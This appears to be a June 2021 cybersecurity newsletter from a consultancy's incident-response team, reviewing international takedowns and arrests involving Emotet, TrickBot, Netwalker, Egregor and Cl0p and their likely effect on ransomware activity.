[1] https://learn.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-device-code

Cet article Illicit consent grant attacks targeting Azure and Office 365: still a threat? est apparu en premier sur RiskInsight.

DECRYPTION

CYBER CRIMINAL NETWORK DISMANTELING

The last 6 months, large-scale coordinated international actions have dismantled several of the biggest cybercriminal networks such as Emotet, Netwalker, Egregor or even Cl0p. Let’s have a closer look at some of them.

What is Emotet?

Emotet was originally a banking trojan, stealing emails and contact list, retrieving passwords on navigators and systems, spreading within the infected network. In 2019, Emotet lost its banking module and became a dropper of malwares. The trojan used a botnet of 1.6 million machines  to realize phishing campaign and install itself on victims’ machines.

Why is Emotet called the “king of malware”?

At the end of 2020, Emotet was identified as one of the most dangerous malwares. Additionally, being a dropper as well as a botnet, Emotet also served as a front door to many other malwares. It was used to drop malicious payloads directly onto the victims’ assets: for example, TrickBot was dropped onto the targeted machine which in turn, would drop Ryuk or Conti ransomware. According to Checkpoint Research, Emotet was at the top of the Global Threat Index in October 2020 and was linked to a wave of ransomware attacks. According to CISA, the U.S. Cybersecurity & Infrastructure Security Agency, Emotet infections cost is estimated at $1 million per incident.

Main TA542’s customer base, “The Malware As a Service EMOTET”, ANSSI 2021

During several months, Europol used the help of Eurojust, France, Germany, United States of America and announced their successful dismantle of the Emotet network in January 2021.

Does this dismantling mean the end of the malware?

The end of one botnet actually led to the rise of several others, such as TrickBot, which even though existed since 2016, replaced Emotet as one of the most well-established MaaS (Malware as a Service) not long after the events on January.

This turn of events might not be so surprising, as threat actors often pivot and change their tools along the way, whether by choice or by necessity as it was the case here. Taking one malware down would only force them to use another one. Yet, what is interesting is that TrickBot also suffered a dismantlement of its own, back in October 2020. In an attempt to disrupt one of the most used distributors of ransomware, Microsoft joined forces with other security teams to take down TrickBot servers. As you may have noticed, this was months before law-enforcement took down Emotet, and now TrickBot or other versions of this malware, still lives on. These actions only disrupted TrickBot activities for a few days, before going back to what it was and even overtaking Emotet dominance.

Moreover, TrickBot seems to be somehow connected to the Bazar malware (BazarLoader and BazarBackdoor), as some part of its infrastructure is shared with TrickBot and both show code similarities. This new toolset is now the most seen malware used to deploy Ryuk ransomware instead of the previous Emotet-TrickBot-Ryuk or TrickBot-Ryuk chain of infection. These changes might have to do with the previously mentioned dismantlements, or due to a new collaboration between threat actors.

What about the people behind these groups?

More recently, on June 4th, Alla Witte was charged on multiple counts for participating in TrickBot criminal activities. Is this arrest, serving as a warning with several hundreds of years of prison if convicted, going to change cybercriminals’ operations? A few months before that, the Ukrainian authorities cooperated with the French law enforcement to conduct an arrest against Egregor members, while a Canadian tied to Netwalker ransomware was charged by the police for distributing the malware. Last year was also marked by several other arrests of cybercriminals around the world. For instance, the arrest of members of the Infinity Black website selling user credentials, lead to the end of the website and the group altogether. On the other hand, the arrests mentioned regarding Netwalker and Egregor seem to concern ransomware affiliates. And as the operators are still free and collaborate with other affiliates, their ransomware continues being deployed around the world. Alla Witte’s case is different since she is suspected to be a malware developer for the TrickBot Group. While her possible conviction might slightly disrupt TrickBot, it seems like their operations still go on, as according to the any.run website and its malware trend tracker, the trojan was last seen on June 16th, 2021. Last but not least, some mid-tier members of the Cl0p gang may have been arrested mid-June in Ukraine even though it seems no core actor behind Cl0p were apprehended.

What could be the long-term consequences of these takedown for the cybercriminal activities?

It’s still early to draw meaningful conclusions on the consequences for cybercriminal activities with the recent arrests. Yesterday, June 16th, at the Geneva summit, U.S. President Joe Biden met with Russian President Vladimir Putin. One of the hot topics of discussions was the ransomware attacks on U.S. entities from Russian soil. Biden warned Putin that United States would not tolerate any other cyber-attacks, especially on 16 critical sectors. The G7 and the NATO also stated that in order not to consider cyber-attacks as armed attacks, Russia should try to identify and disrupt ransomware organizations within its borders.

Even with the arrests of criminal gang members and cybersecurity talks at the presidential levels, some experts say there would be no or little impact on ransomware groups that will still operate with impunity. The near future will give hints about the possible evolution of the cyber-attacks landscape. On one hand, the rising of a broader international collaboration against cyber-criminal gangs which could lead to less opportunistic and lucrative attacks. On the other hand, growing tensions between two blocks: U.S.-Europe and Russia-China with possible sanctions from either side and more cyber espionage, supply-chain or state-sponsored attacks.

CERT-W: FROM THE FRONT LINE

The First Responder Word

FOCUS TECH

Phishing

Think like a cybercriminal and understand how a spear phishing campaign is built to avoid them!

The technical zoom of the month:

To learn more about this:

Reading Of The Month

We recommend the short report “APT trends report Q1 2021”, which reviews the highlight events and findings observed by the Global Research and Analysis Team at Kaspersky during the Q1 2021 around the world.

Cet article Newsletter CERT-W, from the front line – June 2021 est apparu en premier sur RiskInsight.